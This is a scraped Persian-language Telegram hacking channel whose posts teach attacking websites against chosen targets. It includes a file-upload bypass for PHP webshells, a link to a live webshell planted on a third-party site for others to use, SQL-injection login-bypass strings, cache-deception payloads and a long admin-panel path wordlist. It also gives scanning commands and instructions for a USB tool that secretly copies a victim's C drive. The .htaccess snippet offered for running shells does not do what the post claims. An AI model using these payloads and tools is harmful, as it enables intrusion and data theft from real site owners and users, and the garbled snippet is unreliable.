0Day.Today | Learn Exploit | Zero World | Dark web |
19K subscribers
1.23K photos
125 videos
489 files
1.27K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
باگ rfu باگی است که به ما اجازه میدهد فایل های غیرمجاز .html .php .txt را در سایت target آپلود کنیم و rfu مخفف شده remote file upload است

درواقع اگه اپلودری حتی فقططط فایل txt هماپلود بکنه باگ rfu داره

با استفاده از addons ها و یا اینسپکت المنت خودمون میتوانیم content type وب شل خود را به image/jpeg تغییر بدیم و بعد روی گزینه replay بزنیم و اگر آپلودر تارگت bug داشته باشه فایل .php ما اپلود میشه


کد آسیب پذیر در این نوع آپلود ها :

if ($_FILES['upload'['type']=='image/jpeg'){}


اگر اپلودر روی size فایل فیلترینگ انجام دهد باز میتوانیم با addonse و اینسپکت المنت آن آپلودر را بایپس و شل خود را آپلود کنیم

گاهی ممکن است در یک آپلودر این پسوند های . Php و... فیلتر شده باشند در این جور مواقع ممکن است نفوذگر با تغییر پسوند شل خود به jpg شل خود را آپلود کند سپس یک .htaccess آپلود کند که تمامی فایل های jpg را با کامپایلر php اجرا کند در این مواقع شل با پسوند jpg اجرا میشود


با استفاده از کد زیر که در .htaccess وارد میکنیم وب سرور تمامی فایل های با پسوند jpg را با کامپایلر php اجرا میکند در واقع ما با این روش میتوانیم شل اسکریپت خودمون رو با پسوند jpg روی سرور اجرا کنیم پس کافیه این نوع .htaccess رو روی سرور تارگت آپلود کنیم تا آن آپلودر را بایپس کنیم :

RemoveHandler .jpg
AddType application/octet-stream .php

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍61
📢 ا حتمال قطع موقت سرویس‌های اینترنتی 📌
🔞 با توجه به شرایط موجود و اعلام وضعیت قرمز سازمان پدافند غیرعامل، امکان قطع موقتی سرویس‌ها و ایران اکسس شدن برخی از دیتاسنترها و... وجود داره.

#سراسری ⚡️
@soltane_sorat
@learnexploit
برای fuzz از چه ابزار هایی استفاده کنیم ؟

Dirb
gobuster
dirsearch
ffuf
Wfuzz

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
این اکستنشن هایی برای وب هکینگ داشته باشیم ؟

Wappalyzer
Foxy proxy
Cookie editor
Shodan

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
2
شل برای تمرین فقط استفاده کنید حذفش نکنید بزارید بقیه هم استفاده کنن ❤️

https://bittergravity.com/test/fox63.php


#hack #Website #access #webshell
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

@Bvrce
یه نکته مهم گاهی وقتا میخواین ورژن مثلا وب سرور رو در بیارین برای اکسپلوت کردن چیکار میکنیم ؟

از ورژن اسکنر خوده nmap استفاده میکنیم :

nmap -n -O -sT -p 1-1024 ip -sv

با netcat هم میتونید ورژن اسکن کنید :

nc -nvw2 ip 20-80


#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍3
Bypass Methods In Cash Deception:

.css
%2ecss
/;test.css
/!test.css
/.css
%0A%0D-testtest.css
%0A%0D%09session.css
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/imexemi
👍1🔥1
Admin panel path for pentest

Admin bypass and ....


admin/
administrator/
admin1/
admin2/
admin3/
admin4/
admin5/
usuarios/
usuario/
moderator/
webadmin/
adminarea/
bb-admin/
adminLogin/
admin_area/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
adm/
admin/account.php
admin/index.php
admin/login.php
admin/admin.php
admin_area/admin.php
admin_area/login.php
siteadmin/login.php
siteadmin/index.php
siteadmin/login.html
admin/account.html
admin/index.html
admin/login.html
admin/admin.html
admin_area/index.php
bb-admin/index.php
bb-admin/login.php
bb-admin/admin.php
admin/home.php
admin_area/login.html
admin_area/index.html
admin/controlpanel.php
admin.php
admincp/index.asp
admincp/login.asp
admincp/index.html
adminpanel.html
webadmin.html
webadmin/index.html
webadmin/admin.html
webadmin/login.html
admin/admin_login.html
admin_login.html
panel-administracion/login.html
admin/cp.php
cp.php
administrator/index.php
administrator/login.php
nsw/admin/login.php
webadmin/login.php
admin/admin_login.php
admin_login.php
administrator/account.php
administrator.php
admin_area/admin.html
pages/admin/admin-login.php
admin/admin-login.php
admin-login.php
bb-admin/index.html
bb-admin/login.html
acceso.php
bb-admin/admin.html
admin/home.html
login.php
modelsearch/login.php
moderator.php
moderator/login.php
moderator/admin.php
account.php
pages/admin/admin-login.html
admin/admin-login.html
admin-login.html
controlpanel.php
admincontrol.php
admin/adminLogin.html
adminLogin.html
home.html
rcjakar/admin/login.php
adminarea/index.html
adminarea/admin.html
webadmin.php
webadmin/index.php
webadmin/admin.php
admin/controlpanel.html
admin.html
admin/cp.html
cp.html
adminpanel.php
moderator.html
administrator/index.html
administrator/login.html
user.html
administrator/account.html
administrator.html
login.html
modelsearch/login.html
moderator/login.html
adminarea/login.html
panel-administracion/index.html
panel-administracion/admin.html
modelsearch/index.html
modelsearch/admin.html
admincontrol/login.html
adm/index.html
adm.html
moderator/admin.html
user.php
account.html
controlpanel.html
admincontrol.html
panel-administracion/login.php
wp-login.php
adminLogin.php
admin/adminLogin.php
home.php
adminarea/index.php
adminarea/admin.php
adminarea/login.php
panel-administracion/index.php
panel-administracion/admin.php
modelsearch/index.php
modelsearch/admin.php
admincontrol/login.php
adm/admloginuser.php
admloginuser.php
admin2.php
admin2/login.php
admin2/index.php
usuarios/login.php
adm/index.php
adm.php
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
account.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/admin.asp
admin_area/admin.asp
admin_area/login.asp
admin_area/index.asp
bb-admin/index.asp
bb-admin/login.asp
bb-admin/admin.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
pages/admin/admin-login.asp
admin/admin-login.asp
admin-login.asp
admin/cp.asp
cp.asp
administrator/account.asp
administrator.asp
acceso.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
administrator/login.asp
moderator/admin.asp
controlpanel.asp
user.asp
admincontrol.asp
adminpanel.asp
webadmin.asp
webadmin/index.asp
webadmin/admin.asp
webadmin/login.asp
admin/admin_login.asp
admin_login.asp
panel-administracion/login.asp
adminLogin.asp
admin/adminLogin.asp
home.asp
adminarea/index.asp
adminarea/admin.asp
adminarea/login.asp
panel-administracion/index.asp
panel-administracion/admin.asp
modelsearch/index.asp
modelsearch/admin.asp
administrator/index.asp
admincontrol/login.asp
adm/admloginuser.asp
admloginuser.asp
admin2.asp
admin2/login.asp
admin2/index.asp
adm/index.asp
adm.asp
affiliate.asp
adm_auth.asp
memberadmin.asp
administratorlogin.asp
siteadmin/login.asp
siteadmin/index.asp
admin/account.cfm
admin/index.cfm
admin/login.cfm
admin/admin.cfm



#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍41
admin_area/admin.cfm
admin_area/login.cfm
siteadmin/login.cfm
siteadmin/index.cfm
admin_area/index.cfm
bb-admin/index.cfm
bb-admin/login.cfm
bb-admin/admin.cfm
admin/home.cfm
admin/controlpanel.cfm
admin.cfm
admin/cp.cfm
cp.cfm
administrator/index.cfm
administrator/login.cfm
nsw/admin/login.cfm
webadmin/login.cfm

admin/admin_login.cfm
admin_login.cfm
administrator/account.cfm
administrator.cfm
pages/admin/admin-login.cfm
admin/admin-login.cfm
admin-login.cfm
login.cfm
modelsearch/login.cfm
moderator.cfm
moderator/login.cfm
moderator/admin.cfm
account.cfm
controlpanel.cfm
admincontrol.cfm
acceso.cfm
rcjakar/admin/login.cfm
webadmin.cfm
webadmin/index.cfm
webadmin/admin.cfm
adminpanel.cfm
user.cfm
panel-administracion/login.cfm
wp-login.cfm
adminLogin.cfm
admin/adminLogin.cfm
home.cfm
adminarea/index.cfm
adminarea/admin.cfm
adminarea/login.cfm
panel-administracion/index.cfm
panel-administracion/admin.cfm
modelsearch/index.cfm
modelsearch/admin.cfm
admincontrol/login.cfm
adm/admloginuser.cfm
admloginuser.cfm
admin2.cfm
admin2/login.cfm
admin2/index.cfm
usuarios/login.cfm
adm/index.cfm
adm.cfm
affiliate.cfm
adm_auth.cfm
memberadmin.cfm
administratorlogin.cfm
admin/account.js
admin/index.js
admin/login.js
admin/admin.js
admin_area/admin.js
admin_area/login.js
siteadmin/login.js
siteadmin/index.js
admin_area/index.js
bb-admin/index.js
bb-admin/login.js
bb-admin/admin.js
admin/home.js
admin/controlpanel.js
admin.js
admin/cp.js
cp.js
administrator/index.js
administrator/login.js
nsw/admin/login.js
webadmin/login.js
admin/admin_login.js
admin_login.js
administrator/account.js
administrator.js
pages/admin/admin-login.js
admin/admin-login.js
admin-login.js
login.js
modelsearch/login.js
moderator.js
moderator/login.js
moderator/admin.js
account.js
controlpanel.js
admincontrol.js
rcjakar/admin/login.js
webadmin.js
webadmin/index.js
acceso.js
webadmin/admin.js
adminpanel.js
user.js
panel-administracion/login.js
wp-login.js
adminLogin.js
admin/adminLogin.js
home.js
adminarea/index.js
adminarea/admin.js
adminarea/login.js
panel-administracion/index.js
panel-administracion/admin.js
modelsearch/index.js
modelsearch/admin.js
admincontrol/login.js
adm/admloginuser.js
admloginuser.js
admin2.js
admin2/login.js
admin2/index.js
usuarios/login.js
adm/index.js
adm.js
affiliate.js
adm_auth.js
memberadmin.js
administratorlogin.js
admin/account.cgi
admin/index.cgi
admin/login.cgi
admin/admin.cgi
admin_area/admin.cgi
admin_area/login.cgi
siteadmin/login.cgi
siteadmin/index.cgi
admin_area/index.cgi
bb-admin/index.cgi
bb-admin/login.cgi
bb-admin/admin.cgi
admin/home.cgi
admin/controlpanel.cgi
admin.cgi
admin/cp.cgi
cp.cgi
administrator/index.cgi
administrator/login.cgi
nsw/admin/login.cgi
webadmin/login.cgi
admin/admin_login.cgi
admin_login.cgi
administrator/account.cgi
administrator.cgi
pages/admin/admin-login.cgi
admin/admin-login.cgi
admin-login.cgi
login.cgi
modelsearch/login.cgi
moderator.cgi
moderator/login.cgi
moderator/admin.cgi
account.cgi
controlpanel.cgi
admincontrol.cgi
rcjakar/admin/login.cgi
webadmin.cgi
webadmin/index.cgi
acceso.cgi
webadmin/admin.cgi
adminpanel.cgi
user.cgi
panel-administracion/login.cgi
wp-login.cgi
adminLogin.cgi
admin/adminLogin.cgi
home.cgi
adminarea/index.cgi
adminarea/admin.cgi
adminarea/login.cgi
panel-administracion/index.cgi
panel-administracion/admin.cgi
modelsearch/index.cgi
modelsearch/admin.cgi
admincontrol/login.cgi
adm/admloginuser.cgi
admloginuser.cgi
admin2.cgi
admin2/login.cgi
admin2/index.cgi
usuarios/login.cgi
adm/index.cgi
adm.cgi
affiliate.cgi
adm_auth.cgi
memberadmin.cgi
administratorlogin.cgi
admin_panel/
admin_panel.html
adm_cp/



#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍4
0Day.Today | Learn Exploit | Zero World | Dark web |
Admin panel path for pentest Admin bypass and .... admin/ administrator/ admin1/ admin2/ admin3/ admin4/ admin5/ usuarios/ usuario/ moderator/ webadmin/ adminarea/ bb-admin/ adminLogin/ admin_area/ panel-administracion/ instadmin/ memberadmin/ administratorlogin/…
Master Passwords : you can bypassing admin login pages
With master Passwords!
Fill in the input fields with these.
------------------------------------
' or ''='
') or true—
') or ('')=('
') or 1—
') or ('x')=('
" or true—
" or ""="
" or 1—
'or''='
" or "x"="
") or true—
") or ("")=("
") or 1—
") or ("x")=("
')) or true—
')) or ((''))=(('
')) or 1—
')) or (('x'))=(('

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍6
Media is too big
VIEW IN TELEGRAM
نحوه هک یک دانشگاه با استفاده ابزار web checker

ابن ابزار برای جمع اوری اطلاعات از تارگت شما استفاده میشه

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

@Bvrce
8😁3
کسی ریاضی مهندسی بلده حل کنه؟
@soltane_sorat
👍1
کش پویزنینگ (Cache Poisoning):
کش پویزنینگ یک نوع حمله به سرورهای وب است که هدف آن تغییر و آلوده کردن محتوای کش (cache) است. در این حمله، یک مهاجم داده‌های مخرب را در کش وب سرور قرار می‌دهد. سپس، زمانی که کاربران به منابع کش‌شده دسترسی پیدا می‌کنند، داده‌های آلوده و مخرب به آن‌ها ارسال می‌شود. به این ترتیب، کاربران بدون اطلاع از تغییرات، محتوای نادرست یا کدهای مخرب را دریافت می‌کنند.

این حمله می‌تواند از طریق unkeyed پارامترها صورت بگیرد. این پارامترها ورودی‌هایی هستند که در سیستم کش نادیده گرفته می‌شوند و محتوای مشابهی برای کاربران مختلف تولید می‌شود. مهاجم با استفاده از این نوع پارامترها می‌تواند محتوای کش‌شده را دستکاری کند و داده‌های مخربی را به کاربران دیگر ارائه دهد.


آنکید (Unkeyed) پارامترها:
پارامترهای "unkeyed" به پارامترهایی اشاره دارند که در فرآیند کش (cache) وب سرور نقشی ندارند و کش به آن‌ها توجه نمی‌کند. به عنوان مثال، پارامترهایی که در URL یک درخواست وب اضافه می‌شوند، ولی توسط سیستم کش به‌عنوان بخشی از کلید کش (cache key) در نظر گرفته نمی‌شوند. این باعث می‌شود که تمامی درخواست‌ها (حتی اگر شامل پارامترهای متفاوتی باشند) به یک منبع کش‌شده ارجاع داده شوند.

مهاجمان می‌توانند از این ضعف برای ارسال درخواست‌های حاوی پارامترهای مخرب استفاده کنند و باعث شوند که محتوای آلوده به کش ارسال شود و سپس به کاربران بی‌اطلاع توزیع شود.

هدرهای Unkeyed:
در این نوع حمله، مهاجم تلاش می‌کند یک هدر Unkeyed پیدا کند که رفلکت شود. هدرهایی که در درخواست‌های HTTP به سرور ارسال می‌شوند، می‌توانند در پاسخ‌های سرور به‌طور ناخواسته منعکس (رفلکت) شوند. اگر هدرهای خاصی در محتوای پاسخ یا کلید کش لحاظ نشوند، می‌توانند به‌عنوان برداری برای حملات رفلکتیو (reflected attacks) مورد سوءاستفاده قرار گیرند.

در این سناریو، مهاجم تلاش می‌کند تا یک هدر پیدا کند که سرور بدون اینکه آن را رمزنگاری کند یا به عنوان بخشی از کلید کش لحاظ کند، در پاسخ بازگرداند. با این کار، می‌توان هدرهای مخرب را به‌صورت رفلکت‌شده به کاربران دیگر ارسال کرد و آسیب‌پذیری‌هایی همچون XSS یا Cache Poisoning را اجرا کرد.

اکستنشن Param Miner:
ابزار Param Miner یکی از ابزارهای تست امنیتی در زمینه پیدا کردن پارامترهای آسیب‌پذیر است. این ابزار به‌طور خودکار پارامترهایی را که توسط سیستم کش نادیده گرفته می‌شوند، کشف می‌کند. این پارامترها می‌توانند در حملات مختلف، از جمله حملات cache poisoning، استفاده شوند. این ابزار به‌ویژه در سناریوهایی که مهاجمان به دنبال پارامترهای unkeyed هستند، مفید است.

این اکستنشن می‌تواند درخواست‌های مختلفی با پارامترهای تصادفی به سرور ارسال کند و بررسی کند که آیا این پارامترها در فرآیند کش نادیده گرفته می‌شوند یا خیر. در این صورت، از آن‌ها می‌توان برای حملات Cache Poisoning استفاده کرد.

رفلکشن کوکی‌ها (Cookie Reflection):
رفلکشن کوکی‌ها یک آسیب‌پذیری مهم در امنیت وب است. در این نوع حمله، کوکی‌های کاربر توسط سرور بدون تغییر یا اعتبارسنجی مجدد در پاسخ HTTP بازگردانده می‌شوند. این نوع رفتار می‌تواند برای اجرای حملات XSS یا Cache Poisoning مورد استفاده قرار گیرد.

به‌عنوان مثال، اگر مهاجم بتواند کوکی‌های کاربر را به‌صورت رفلکت‌شده در پاسخ سرور قرار دهد و این اطلاعات در کش ذخیره شود، کاربران دیگر نیز می‌توانند محتوای آلوده را دریافت کنند. رفلکشن کوکی‌ها اغلب با استفاده از هدرهای HTTP یا پارامترهای URL همراه می‌شود و می‌تواند باعث افشای داده‌های حساس کاربران یا اجرا شدن کدهای مخرب در مرورگرهای آن‌ها شود.
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
T.me/imexemi
❤‍🔥6👍3👏1
Forwarded from imem!
USB-Copyer.rar
686 B
ابزاری برای کپی درایو C تارگت در USB
- تمامی فایل هارو داخل فلش بریزید.
- داخل usb تون یک ترمینال باز کنید و دستور زیر رو وارد کنید:
attrib +H copy.bat & attrib +H invisible.vbs
- با این دستور دوتا فایل رو هیدن کردید
و فقط یه فایل start.bat مونده.
- فقط کافیه USB رو به سیستم قربانی بزنید و فایل start.bat رو ران کنید.

Password => @imexemi

Join => @imexemi
3
Media is too big
VIEW IN TELEGRAM
جمع آوری اطلاعات - جمع آوری سایت های روی سرور همان ریورس که در ویدیو بالا تر دیدین اما با ابزار revers.py برای اینکه سریع تر تارگت هارو جمع اوردی کنید

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍5🆒1
reverseip.py
2.9 KB
👆👆👆


#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
5❤‍🔥1